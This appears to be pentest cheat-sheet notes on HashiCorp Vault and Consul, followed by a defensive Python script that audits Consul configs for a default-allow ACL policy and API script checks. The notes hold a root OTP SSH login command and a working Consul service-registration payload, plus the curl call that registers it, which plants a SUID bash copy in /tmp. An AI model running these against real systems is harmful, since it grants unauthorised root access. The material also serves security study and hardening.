HashiCorp

Vault

OTP (One-Time Password)

  • Accessing .vault-token and secret.sh files can reveal critical configurations.

  • Vault can be configured to generate OTPs for SSH logins.

This vault ssh command generates an OTP and logs the user in automatically:
vault ssh -role root_otp -mode otp root@<target-IP>

Consul

Documentation

The configuration is located in /etc/consul.d/config.json

If acl_default_policy is set to allow, no authentication is required.

Check version
consul version

Check Services Running
consul catalog services

RCE via Creating Service

Use the REST API to register a service

Malicious Service
{
  "Name": "Tokyo service",
  "ID": "rev-shell",
  "Port": 0,
  "Check": {
    "args": ["bash", "-c", "cp /bin/bash /tmp/tokyo && chmod 6777 /tmp/tokyo"],
    "interval": "30s",
    "timeout": "5s"
  }
}

Use the API to register the service definition saved as service.json:
curl -X PUT http://127.0.0.1:8500/v1/agent/service/register -H "Content-Type: application/json" -d @service.json 
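
A defensive check for the settings this section depends on, as an added example that is not part of the original page: it audits an agent config such as /etc/consul.d/config.json for a default-allow ACL policy and for enable_script_checks, the setting that lets a check's args registered over the HTTP API be executed. The sample configs and finding names are constructed for illustration.

```python
import json

# Constructed sample configs (not taken from a real host).
WEAK_CONFIG = '''{
  "datacenter": "dc1",
  "acl_default_policy": "allow",
  "enable_script_checks": true
}'''

HARDENED_CONFIG = '''{
  "datacenter": "dc1",
  "acl": {"enabled": true, "default_policy": "deny"},
  "enable_script_checks": false,
  "enable_local_script_checks": true
}'''


def audit_consul_config(text):
    """Return finding IDs (hypothetical labels) for a Consul agent config in JSON."""
    cfg = json.loads(text)
    acl = cfg.get("acl", {})
    findings = []

    # The policy may sit in the nested "acl" block or in the legacy top-level key.
    # Consul falls back to "allow" when no default policy is configured.
    policy = acl.get("default_policy", cfg.get("acl_default_policy", "allow"))
    # A nested block with ACLs switched off enforces nothing, whatever the policy says.
    if acl and not acl.get("enabled", False):
        policy = "allow"
    if policy != "deny":
        findings.append("acl-default-allow")

    # enable_script_checks lets checks registered over the HTTP API run commands.
    # enable_local_script_checks limits script checks to local config files.
    if cfg.get("enable_script_checks", False):
        findings.append("script-checks-via-api")

    # Together: an unauthenticated API caller can register a check with "args".
    if {"acl-default-allow", "script-checks-via-api"} <= set(findings):
        findings.append("unauthenticated-command-execution")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_consul_config(text) or "no findings")
```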
